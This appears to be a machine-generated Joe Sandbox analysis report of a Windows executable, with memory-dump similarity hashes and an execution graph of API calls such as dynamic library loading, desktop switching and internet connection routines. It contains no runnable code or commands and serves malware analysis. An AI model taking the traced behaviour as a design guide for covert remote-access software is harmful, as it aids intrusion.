                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide_snwprintf
                                                                                        • String ID: $%s$@%s
                                                                                        • API String ID: 2650857296-834177443
                                                                                        • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                        • Instruction ID: de964a30331aaeaa7b2a12af58cd956e2bf1d71f5dc209c680c471166470939d
                                                                                        • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                        • Instruction Fuzzy Hash: CB31C272B18A4696FA50AF66E8406E9A3A0FF98784F802036EF4D17795EF3DE505C710
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandleType
                                                                                        • String ID: @
                                                                                        • API String ID: 3000768030-2766056989
                                                                                        • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                        • Instruction ID: 5be37c73e88f5e34f77af75941c23af962442b2cfb5c763b42b1937ac8f86c91
                                                                                        • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                        • Instruction Fuzzy Hash: E621B922A0878641EB649B28DC9067AA651EF5D774F682336D6EF077E4CF3CE881C311
                                                                                        APIs
                                                                                        • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E7B1D3E), ref: 00007FF70E7B40BC
                                                                                        • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70E7B1D3E), ref: 00007FF70E7B4102
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                        • String ID: csm
                                                                                        • API String ID: 2573137834-1018135373
                                                                                        • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                        • Instruction ID: 9eb24bfa8ed2711e5192f82dcebbdda30d363323aca1819cefc7d4c27100d2b9
                                                                                        • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                        • Instruction Fuzzy Hash: 5F115B32A08B4182EB209B15F840269B7A4FB98B94F585234EEDC07755EF3CD951C700
                                                                                        APIs
                                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA63
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF70E79E95F,?,?,?,00007FF70E79463A,?,?,?), ref: 00007FF70E79EA6E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastObjectSingleWait
                                                                                        • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                        • API String ID: 1211598281-2248577382
                                                                                        • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                        • Instruction ID: 88ffe9194739e1079862a43d9336f10f3fa92eae6b8f6b3fe626f4bcb307b508
                                                                                        • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                        • Instruction Fuzzy Hash: DAE01A25E19C4282F600B721EC46478A260BFAD774FD02331D03E811F59F2CA98A8321
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2147933165.00007FF70E781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70E780000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2147910215.00007FF70E780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148266667.00007FF70E7C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2148391721.00007FF70E7E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2150182579.00007FF70E7EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_7ff70e780000_file.jbxd
                                                                                        Similarity
                                                                                        • API ID: FindHandleModuleResource
                                                                                        • String ID: RTL
                                                                                        • API String ID: 3537982541-834975271
                                                                                        • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                        • Instruction ID: 8423ba80202caec56ee9540ec4f538f502301282e40b91b7f10762698925ea5a
                                                                                        • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                        • Instruction Fuzzy Hash: 85D01791F0964682FF196B75E84937462945F1CB51F88603CC94E06390EF2DA0C8C761

                                                                                        Execution Graph

                                                                                        Execution Coverage:5.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:15.1%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:108
                                                                                        execution_graph 80179 11108d30 80222 1110f420 80179->80222 80182 11108da9 OpenEventA 80185 11108ed1 GetStockObject GetObjectA InitializeCriticalSection InitializeCriticalSection 80182->80185 80186 11108e18 CloseHandle GetSystemDirectoryA 80182->80186 80187 1110f420 std::locale::facet::_Facet_Register 265 API calls 80185->80187 80188 11108e38 80186->80188 80189 11108f23 80187->80189 80188->80188 80190 11108e40 LoadLibraryA 80188->80190 80191 11108f3c 80189->80191 80299 110f4680 268 API calls std::locale::facet::_Facet_Register 80189->80299 80190->80185 80192 11108e71 80190->80192 80250 1110f2b0 80191->80250 80266 111450a0 80192->80266 80196 11108e7b 80197 11108e82 GetProcAddress 80196->80197 80198 11108e9a GetProcAddress 80196->80198 80197->80198 80200 11108ec4 FreeLibrary 80198->80200 80201 11108eb6 80198->80201 80200->80185 80201->80185 80204 11109005 80302 11161d01 80204->80302 80205 1110f420 std::locale::facet::_Facet_Register 265 API calls 80207 11108f73 80205->80207 80209 11108f84 80207->80209 80210 11108f8d 80207->80210 80208 1110901f 80300 110f4680 268 API calls std::locale::facet::_Facet_Register 80209->80300 80212 1110f2b0 424 API calls 80210->80212 80213 11108fa9 CloseHandle 80212->80213 80214 111450a0 std::locale::facet::_Facet_Register 90 API calls 80213->80214 80215 11108fba 80214->80215 80215->80204 80216 1110f420 std::locale::facet::_Facet_Register 265 API calls 80215->80216 80217 11108fc8 80216->80217 80218 11108fe2 80217->80218 80301 110f4680 268 API calls std::locale::facet::_Facet_Register 80217->80301 80220 1110f2b0 424 API calls 80218->80220 80221 11108ffe CloseHandle 80220->80221 80221->80204 80310 11162b51 80222->80310 80225 1110f473 _memset 80229 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80225->80229 80226 1110f447 wsprintfA 80327 11029450 265 API calls 2 library calls 80226->80327 80230 11108d91 80229->80230 80230->80182 80231 11107290 80230->80231 80336 1110f520 80231->80336 80234 1110f520 3 API calls 80235 111072dc 80234->80235 80236 1110f520 3 API calls 80235->80236 80237 111072ee 80236->80237 80238 1110f520 3 API calls 80237->80238 80239 111072ff 80238->80239 80240 1110f520 3 API calls 80239->80240 80241 11107310 80240->80241 80242 1110f420 std::locale::facet::_Facet_Register 265 API calls 80241->80242 80243 11107321 80242->80243 80244 1110740a 80243->80244 80245 1110732c LoadLibraryA LoadLibraryA 80243->80245 80343 1116219a 66 API calls std::exception::_Copy_str 80244->80343 80245->80182 80247 11107419 80344 111625f1 RaiseException 80247->80344 80249 1110742e 80251 1110f2d0 CreateThread 80250->80251 80252 1110f2bf CreateEventA 80250->80252 80254 1110f2f6 80251->80254 80255 1110f30d 80251->80255 80348 11102c50 80251->80348 80370 1110fde0 80251->80370 80384 11027270 80251->80384 80409 1102c410 80251->80409 80252->80251 80347 11029450 265 API calls 2 library calls 80254->80347 80257 1110f311 WaitForSingleObject CloseHandle 80255->80257 80258 11108f58 CloseHandle 80255->80258 80257->80258 80260 1109e9e0 80258->80260 80261 1109e9ef GetCurrentProcess OpenProcessToken 80260->80261 80262 1109ea2d 80260->80262 80261->80262 80263 1109ea12 80261->80263 80262->80204 80262->80205 80801 1109e910 80263->80801 80265 1109ea1b CloseHandle 80265->80262 80267 111450c1 GetVersionExA 80266->80267 80275 1114529c 80266->80275 80268 111450e3 80267->80268 80267->80275 80271 111450f0 RegOpenKeyExA 80268->80271 80268->80275 80269 111452a5 80270 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80269->80270 80272 111452b2 80270->80272 80274 1114511d _memset 80271->80274 80271->80275 80272->80196 80273 11145304 80276 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80273->80276 80814 11143000 RegQueryValueExA 80274->80814 80275->80269 80275->80273 80825 11081c60 80275->80825 80277 11145314 80276->80277 80277->80196 80281 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 80283 11145189 80281->80283 80282 111452ec 80282->80269 80285 11162de7 std::locale::facet::_Facet_Register 79 API calls 80282->80285 80284 1114528f RegCloseKey 80283->80284 80816 11162de7 80283->80816 80284->80275 80287 111452fd 80285->80287 80287->80269 80287->80273 80290 111451c6 80292 11162de7 std::locale::facet::_Facet_Register 79 API calls 80290->80292 80291 11163a2d __hextodec 79 API calls 80293 111451ad 80291->80293 80295 111451d2 _strncpy 80292->80295 80293->80290 80293->80291 80294 11145271 80294->80284 80295->80294 80296 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 80295->80296 80297 11145248 80296->80297 80298 11143000 std::locale::facet::_Facet_Register RegQueryValueExA 80297->80298 80298->80294 80299->80191 80300->80210 80301->80218 80303 11161d0b IsDebuggerPresent 80302->80303 80304 11161d09 80302->80304 80973 11177637 80303->80973 80304->80208 80307 1116bc99 SetUnhandledExceptionFilter UnhandledExceptionFilter 80308 1116bcb6 __call_reportfault 80307->80308 80309 1116bcbe GetCurrentProcess TerminateProcess 80307->80309 80308->80309 80309->80208 80311 11162bce 80310->80311 80315 11162b5f 80310->80315 80334 1116d4a8 DecodePointer 80311->80334 80313 11162bd4 80335 111692ef 66 API calls __getptd_noexit 80313->80335 80317 11162b6a 80315->80317 80318 11162b8d RtlAllocateHeap 80315->80318 80321 11162bba 80315->80321 80325 11162bb8 80315->80325 80331 1116d4a8 DecodePointer 80315->80331 80317->80315 80328 1116d99d 66 API calls 2 library calls 80317->80328 80329 1116d7ee 66 API calls 7 library calls 80317->80329 80330 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 80317->80330 80318->80315 80319 1110f43e 80318->80319 80319->80225 80319->80226 80332 111692ef 66 API calls __getptd_noexit 80321->80332 80333 111692ef 66 API calls __getptd_noexit 80325->80333 80328->80317 80329->80317 80331->80315 80332->80325 80333->80319 80334->80313 80335->80319 80337 1110f536 CreateEventA 80336->80337 80338 1110f549 80336->80338 80337->80338 80339 1110f557 80338->80339 80345 1110f260 InterlockedIncrement 80338->80345 80340 111072cc 80339->80340 80346 1110f3c0 InterlockedIncrement 80339->80346 80340->80234 80343->80247 80344->80249 80345->80339 80346->80340 80444 11089280 80348->80444 80350 11102c5d 80351 11102c69 GetCurrentThreadId GetThreadDesktop OpenDesktopA 80350->80351 80352 11102ccf GetLastError 80351->80352 80353 11102c8f SetThreadDesktop 80351->80353 80354 11146450 std::locale::facet::_Facet_Register 21 API calls 80352->80354 80355 11102cb1 GetLastError 80353->80355 80356 11102c9a 80353->80356 80359 11102ce1 80354->80359 80358 11146450 std::locale::facet::_Facet_Register 21 API calls 80355->80358 80455 11146450 80356->80455 80361 11102cc3 CloseDesktop 80358->80361 80449 11102bd0 80359->80449 80361->80359 80363 11102ceb 80461 1110f340 80363->80461 80365 11102cf2 80466 110f4740 16 API calls 80365->80466 80367 11102cf9 80467 1110f370 SetEvent PulseEvent 80367->80467 80369 11102d00 std::ios_base::_Ios_base_dtor 80520 110b7a20 80370->80520 80372 1110fdee GetCurrentThreadId 80373 1110f340 266 API calls 80372->80373 80379 1110fe09 std::ios_base::_Ios_base_dtor 80373->80379 80374 1110fe80 80524 1110f370 SetEvent PulseEvent 80374->80524 80376 1110fe20 WaitForSingleObject 80522 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 80376->80522 80377 1110fe8a 80379->80374 80379->80376 80380 1110fe43 80379->80380 80523 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 80379->80523 80381 1110fe53 PostMessageA 80380->80381 80382 1110fe58 PostThreadMessageA 80380->80382 80381->80379 80382->80379 80385 110272a2 80384->80385 80386 11089280 5 API calls 80385->80386 80387 110272a9 CreateEventA 80386->80387 80388 1110f420 std::locale::facet::_Facet_Register 265 API calls 80387->80388 80389 110272c6 80388->80389 80390 110272e7 80389->80390 80525 111100d0 80389->80525 80392 1110f340 266 API calls 80390->80392 80393 110272ff 80392->80393 80394 11027316 WaitForMultipleObjects 80393->80394 80398 110273f4 80393->80398 80400 11027375 PostMessageA 80393->80400 80406 110273ba GetCurrentThreadId GetThreadDesktop 80393->80406 80553 11027250 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 80393->80553 80394->80393 80395 1102732d 80394->80395 80396 11027336 PostMessageA 80395->80396 80397 1102734a SetEvent Sleep 80395->80397 80396->80393 80396->80397 80397->80393 80399 1102740e CloseHandle 80398->80399 80554 1110fc70 278 API calls 2 library calls 80398->80554 80555 1110f370 SetEvent PulseEvent 80399->80555 80400->80393 80403 11027405 std::ios_base::_Ios_base_dtor 80403->80399 80404 11027423 80406->80393 80407 110273c9 SetThreadDesktop 80406->80407 80407->80393 80408 110273d4 CloseDesktop 80407->80408 80408->80393 80410 1102c442 80409->80410 80411 1110f340 266 API calls 80410->80411 80412 1102c44f WaitForSingleObject 80411->80412 80413 1102c466 80412->80413 80414 1102c67d 80412->80414 80415 1102c470 GetTickCount 80413->80415 80416 1102c666 WaitForSingleObject 80413->80416 80653 1110f370 SetEvent PulseEvent 80414->80653 80559 110d1550 80415->80559 80416->80413 80416->80414 80419 1102c684 CloseHandle 80654 1110f580 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 80419->80654 80421 1102c695 std::ios_base::_Ios_base_dtor 80423 110d1550 268 API calls 80434 1102c486 80423->80434 80424 1102c6b4 80655 11029450 265 API calls 2 library calls 80424->80655 80426 1102c6c8 80656 11029450 265 API calls 2 library calls 80426->80656 80428 1102c6dc 80657 11029450 265 API calls 2 library calls 80428->80657 80431 1102c6f0 80658 11029450 265 API calls 2 library calls 80431->80658 80433 1102c574 GetTickCount 80442 1102c571 std::ios_base::_Ios_base_dtor 80433->80442 80434->80423 80434->80424 80434->80426 80434->80428 80434->80433 80569 110d0710 80434->80569 80581 11029590 LoadLibraryA 80434->80581 80633 110d1370 269 API calls 2 library calls 80434->80633 80437 11146450 std::locale::facet::_Facet_Register 21 API calls 80437->80442 80438 110d07c0 265 API calls 80438->80442 80442->80424 80442->80426 80442->80431 80442->80433 80442->80437 80442->80438 80443 110679c0 298 API calls 80442->80443 80634 11142290 80442->80634 80643 11042530 267 API calls 2 library calls 80442->80643 80644 110d07c0 80442->80644 80443->80442 80468 1110f6c0 80444->80468 80446 11089290 80447 110892b3 80446->80447 80448 110892a2 UnhookWindowsHookEx 80446->80448 80447->80350 80448->80447 80450 1110f420 std::locale::facet::_Facet_Register 265 API calls 80449->80450 80451 11102bfd 80450->80451 80452 11102c30 80451->80452 80474 11102ab0 80451->80474 80452->80363 80454 11102c1d 80454->80363 80456 11146461 80455->80456 80457 1114645c 80455->80457 80494 111458f0 80456->80494 80497 111456a0 18 API calls std::locale::facet::_Facet_Register 80457->80497 80462 1110f360 SetEvent 80461->80462 80463 1110f349 80461->80463 80462->80365 80519 11029450 265 API calls 2 library calls 80463->80519 80466->80367 80467->80369 80469 1110f6d7 EnterCriticalSection 80468->80469 80470 1110f6ce GetCurrentThreadId 80468->80470 80471 1110f6ee ___DllMainCRTStartup 80469->80471 80470->80469 80472 1110f6f5 LeaveCriticalSection 80471->80472 80473 1110f708 LeaveCriticalSection 80471->80473 80472->80446 80473->80446 80481 1115f550 80474->80481 80477 11102b81 CreateWindowExA 80477->80454 80478 11102b17 std::locale::facet::_Facet_Register 80479 11102b50 GetStockObject RegisterClassA 80478->80479 80479->80477 80480 11102b7a 80479->80480 80480->80477 80484 1115e380 GlobalAddAtomA 80481->80484 80485 1115e3b5 GetLastError wsprintfA 80484->80485 80486 1115e407 GlobalAddAtomA GlobalAddAtomA 80484->80486 80493 11029450 265 API calls 2 library calls 80485->80493 80488 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80486->80488 80490 11102ae1 GlobalAddAtomA 80488->80490 80490->80477 80490->80478 80498 111457a0 80494->80498 80496 11102ca5 CloseDesktop 80496->80359 80497->80456 80499 111457c4 80498->80499 80500 111457c9 80498->80500 80518 111456a0 18 API calls std::locale::facet::_Facet_Register 80499->80518 80502 11145832 80500->80502 80503 111457d2 80500->80503 80504 111458de 80502->80504 80505 1114583f wsprintfA 80502->80505 80506 11145809 80503->80506 80509 111457e0 80503->80509 80507 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80504->80507 80508 11145862 80505->80508 80512 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80506->80512 80510 111458ea 80507->80510 80508->80508 80511 11145869 wvsprintfA 80508->80511 80514 11161d01 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 80509->80514 80510->80496 80517 11145884 80511->80517 80513 1114582e 80512->80513 80513->80496 80515 11145805 80514->80515 80515->80496 80516 111458d1 OutputDebugStringA 80516->80504 80517->80516 80517->80517 80518->80500 80521 110b7a28 std::locale::facet::_Facet_Register 80520->80521 80521->80372 80522->80379 80523->80379 80524->80377 80526 1110f420 std::locale::facet::_Facet_Register 265 API calls 80525->80526 80527 11110101 80526->80527 80528 11110123 GetCurrentThreadId InitializeCriticalSection 80527->80528 80529 1110f420 std::locale::facet::_Facet_Register 265 API calls 80527->80529 80531 11110190 EnterCriticalSection 80528->80531 80532 11110183 InitializeCriticalSection 80528->80532 80533 1111011c 80529->80533 80534 1111024a LeaveCriticalSection 80531->80534 80535 111101be CreateEventA 80531->80535 80532->80531 80533->80528 80556 1116219a 66 API calls std::exception::_Copy_str 80533->80556 80534->80390 80536 111101d1 80535->80536 80537 111101e8 80535->80537 80558 11029450 265 API calls 2 library calls 80536->80558 80540 1110f420 std::locale::facet::_Facet_Register 265 API calls 80537->80540 80543 111101ef 80540->80543 80541 1111013f 80557 111625f1 RaiseException 80541->80557 80545 1111020c 80543->80545 80546 111100d0 418 API calls 80543->80546 80547 1110f420 std::locale::facet::_Facet_Register 265 API calls 80545->80547 80546->80545 80548 1111021c 80547->80548 80549 1111022d 80548->80549 80550 1110f520 3 API calls 80548->80550 80551 1110f2b0 418 API calls 80549->80551 80550->80549 80552 11110245 80551->80552 80552->80534 80553->80393 80554->80403 80555->80404 80556->80541 80557->80528 80659 110d1480 80559->80659 80562 110d159b 80565 110d15b5 80562->80565 80566 110d1598 80562->80566 80563 110d1584 80673 11029450 265 API calls 2 library calls 80563->80673 80565->80434 80566->80562 80674 11029450 265 API calls 2 library calls 80566->80674 80570 110d0724 80569->80570 80732 11163cf8 80570->80732 80573 110d0450 265 API calls 80574 110d0753 80573->80574 80740 110cfe70 80574->80740 80577 110d077c 80577->80434 80578 110d0765 80752 11029450 265 API calls 2 library calls 80578->80752 80604 11029621 std::ios_base::_Ios_base_dtor 80581->80604 80582 11029653 GetProcAddress 80583 11029671 SetLastError 80582->80583 80582->80604 80583->80604 80584 11029748 InternetOpenA 80584->80604 80585 1102972f GetProcAddress 80585->80584 80586 11029779 SetLastError 80585->80586 80586->80604 80587 110296a5 GetProcAddress 80588 11029762 SetLastError 80587->80588 80587->80604 80589 110296d2 GetLastError 80588->80589 80589->80604 80590 11142290 std::locale::facet::_Facet_Register 265 API calls 80590->80604 80591 11162be5 66 API calls _free 80591->80604 80592 110296f5 GetProcAddress 80593 1102976f SetLastError 80592->80593 80592->80604 80593->80604 80594 11162b51 66 API calls _malloc 80594->80604 80595 11029a40 80599 11029b76 GetProcAddress 80595->80599 80600 11029a31 80595->80600 80596 11029bb0 80596->80442 80597 11029ba9 FreeLibrary 80597->80596 80598 11029a1a std::ios_base::_Ios_base_dtor 80598->80595 80598->80600 80602 11029a57 GetProcAddress 80598->80602 80606 11029b36 std::ios_base::_Ios_base_dtor 80598->80606 80607 11029a88 std::ios_base::_Ios_base_dtor 80598->80607 80599->80600 80603 11029b97 SetLastError 80599->80603 80600->80596 80600->80597 80601 11081a70 IsDBCSLeadByte 80601->80604 80602->80598 80605 11029b2e SetLastError 80602->80605 80603->80600 80604->80582 80604->80584 80604->80585 80604->80587 80604->80589 80604->80590 80604->80591 80604->80592 80604->80594 80604->80598 80604->80601 80611 110297ff GetProcAddress 80604->80611 80612 1102982b GetProcAddress 80604->80612 80613 1102983e InternetConnectA 80604->80613 80619 110298a3 GetProcAddress 80604->80619 80620 11029864 GetProcAddress 80604->80620 80624 110298f1 GetProcAddress 80604->80624 80626 11029922 GetLastError 80604->80626 80629 11029975 GetLastError 80604->80629 80630 1102998c GetDesktopWindow 80604->80630 80605->80606 80785 110278a0 GetProcAddress SetLastError 80606->80785 80607->80598 80607->80606 80623 110d1090 268 API calls 80607->80623 80777 1110f4a0 80607->80777 80784 11027850 GetProcAddress SetLastError 80607->80784 80610 11029b5b 80786 110278a0 GetProcAddress SetLastError 80610->80786 80611->80604 80616 1102981c SetLastError 80611->80616 80612->80613 80618 11029881 SetLastError 80612->80618 80613->80604 80615 11029b6a 80615->80595 80616->80604 80618->80604 80619->80604 80621 110298d6 SetLastError 80619->80621 80620->80604 80622 11029891 SetLastError 80620->80622 80621->80604 80622->80604 80623->80607 80624->80604 80625 11029918 SetLastError 80624->80625 80625->80626 80626->80604 80627 1102993d GetProcAddress 80626->80627 80627->80604 80628 1102996d SetLastError 80627->80628 80628->80629 80629->80604 80629->80630 80630->80604 80631 1102999a GetProcAddress 80630->80631 80631->80604 80632 110299d6 SetLastError 80631->80632 80632->80604 80633->80434 80635 1114229a 80634->80635 80636 1114229c 80634->80636 80635->80442 80637 1110f4a0 std::locale::facet::_Facet_Register 265 API calls 80636->80637 80638 111422c2 80637->80638 80639 111422cb _strncpy 80638->80639 80640 111422e9 80638->80640 80639->80442 80788 11029450 265 API calls 2 library calls 80640->80788 80643->80442 80789 110d05c0 80644->80789 80647 110d07e9 80794 11162be5 80647->80794 80648 110d07d2 80793 11029450 265 API calls 2 library calls 80648->80793 80652 110d07f2 80652->80416 80653->80419 80654->80421 80660 110d148c 80659->80660 80661 110d14a7 80660->80661 80662 110d1490 80660->80662 80675 110d0190 80661->80675 80704 11029450 265 API calls 2 library calls 80662->80704 80669 110d14de 80669->80562 80669->80563 80670 110d14c7 80705 11029450 265 API calls 2 library calls 80670->80705 80676 110d0199 80675->80676 80677 110d019d 80676->80677 80679 110d01b4 80676->80679 80706 11029450 265 API calls 2 library calls 80677->80706 80680 110d01b1 80679->80680 80681 110d01e8 80679->80681 80680->80679 80707 11029450 265 API calls 2 library calls 80680->80707 80683 110d01e5 80681->80683 80684 110d0206 80681->80684 80683->80681 80708 11029450 265 API calls 2 library calls 80683->80708 80687 110d1090 80684->80687 80688 110d109e 80687->80688 80689 110d10b9 80688->80689 80690 110d10a2 80688->80690 80693 110d10b6 80689->80693 80694 110d10ec 80689->80694 80709 11029450 265 API calls 2 library calls 80690->80709 80692 110d1160 80692->80669 80692->80670 80693->80689 80710 11029450 265 API calls 2 library calls 80693->80710 80694->80692 80694->80694 80711 110d09e0 80694->80711 80700 110d111f _memmove 80700->80692 80701 110d1149 80700->80701 80723 11029450 265 API calls 2 library calls 80701->80723 80712 110d09ed 80711->80712 80713 110d0a08 80712->80713 80714 110d09f1 80712->80714 80716 110d0a05 80713->80716 80717 110d0a26 80713->80717 80729 11029450 265 API calls 2 library calls 80714->80729 80716->80713 80730 11029450 265 API calls 2 library calls 80716->80730 80724 110d0450 80717->80724 80722 110d0920 268 API calls 2 library calls 80722->80700 80725 110d045b 80724->80725 80726 110d0472 80724->80726 80731 11029450 265 API calls 2 library calls 80725->80731 80726->80700 80726->80722 80733 11163d09 _strlen 80732->80733 80736 110d072f 80732->80736 80734 11162b51 _malloc 66 API calls 80733->80734 80735 11163d1c 80734->80735 80735->80736 80753 1116be9f 80735->80753 80736->80573 80741 110cfe7d 80740->80741 80742 110cfe98 80741->80742 80743 110cfe81 80741->80743 80745 110cfe95 80742->80745 80746 110cfeb6 80742->80746 80774 11029450 265 API calls 2 library calls 80743->80774 80745->80742 80775 11029450 265 API calls 2 library calls 80745->80775 80748 110cfeb3 80746->80748 80750 110cfed9 80746->80750 80748->80746 80776 11029450 265 API calls 2 library calls 80748->80776 80750->80577 80750->80578 80754 1116beb4 80753->80754 80755 1116bead 80753->80755 80765 111692ef 66 API calls __getptd_noexit 80754->80765 80755->80754 80758 1116bed2 80755->80758 80760 11163d2e 80758->80760 80767 111692ef 66 API calls __getptd_noexit 80758->80767 80760->80736 80762 1116deb2 80760->80762 80761 1116beb9 80766 1116df04 11 API calls _setlocale 80761->80766 80768 1116dd89 80762->80768 80765->80761 80766->80760 80767->80761 80769 1116dda8 _memset __call_reportfault 80768->80769 80770 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 80769->80770 80771 1116de94 __call_reportfault 